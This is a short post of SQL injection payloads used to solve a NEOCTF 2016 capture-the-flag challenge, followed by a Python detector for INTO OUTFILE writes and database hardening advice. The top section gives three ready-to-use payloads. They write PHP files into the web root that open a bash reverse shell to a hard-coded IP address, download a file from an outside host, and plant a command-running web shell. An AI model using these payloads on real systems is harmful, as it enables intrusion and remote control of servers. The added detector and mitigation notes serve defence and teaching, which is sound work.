Useful SQL Injections

I used these to solve the "Robert Tables" problem in NEOCTF 2016.

OPEN A REVERSE SHELL

' union select "<?php exec(\"/bin/bash -c \'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1\'\");" INTO OUTFILE '/var/www/ecustomers/samshell4.php' #

UPLOAD A FILE

' union select "<?php file_put_contents(\"root\", file_get_contents(\"http://attack.samsclass.info/root\")); ?>" INTO OUTFILE '/var/www/ecustomers/samget2.php' #

OPEN A PHP SHELL

' union select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/ecustomers/samshell.php' #
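
All three payloads above share one primitive: a UNION SELECT ... INTO OUTFILE that writes PHP under /var/www/ecustomers, so that clause is the natural detection point. The following detector is an added example, not part of the original post; the "METHOD URL" line format, the /search.php endpoint, the "name" parameter, the extension list and the web root list are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Matches the file-write clause shared by all three payloads on this page.
OUTFILE_RE = re.compile(
    r"\binto\s+(?:out|dump)file\s+(['\"])(?P<path>.+?)\1", re.I | re.S)
SCRIPT_EXT = (".php", ".phtml", ".phar")  # assumed executable extensions
WEB_ROOTS = ("/var/www/",)                # assumed document roots

def inspect_value(value):
    """Return a finding dict if a parameter value tries to write a file via SQL."""
    m = OUTFILE_RE.search(value)
    if not m:
        return None
    path = m.group("path")
    reasons = ["into-outfile"]
    if path.lower().endswith(SCRIPT_EXT):
        reasons.append("script-extension")
    if path.startswith(WEB_ROOTS):
        reasons.append("web-root-target")
    if "<?" in value:
        reasons.append("php-open-tag")
    return {"path": path, "reasons": reasons}

def scan_requests(lines):
    """Scan 'METHOD URL' lines; parse_qsl URL-decodes each parameter first."""
    findings = []
    for n, line in enumerate(lines, 1):
        _method, _, url = line.partition(" ")
        for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
            hit = inspect_value(value)
            if hit:
                findings.append({"line": n, "param": name, **hit})
    return findings

# Constructed sample request lines (payload body shortened to "...").
SAMPLE = [
    "GET /search.php?name=Robert",
    "GET /search.php?name=%27+union+select+%22%3C%3Fphp+...+%3F%3E%22"
    "+INTO+OUTFILE+%27%2Fvar%2Fwww%2Fecustomers%2Fexample.php%27+%23",
    "GET /search.php?name=how+to+export+into+outfile+in+mysql",  # benign text
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE):
        print(finding)
```

On the database side, INTO OUTFILE only works when the application's MySQL account holds the FILE privilege and secure_file_priv permits the target directory, so revoking FILE and restricting secure_file_priv blocks this primitive even if an injection point remains.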


Posted 4-1-16 by Sam Bowne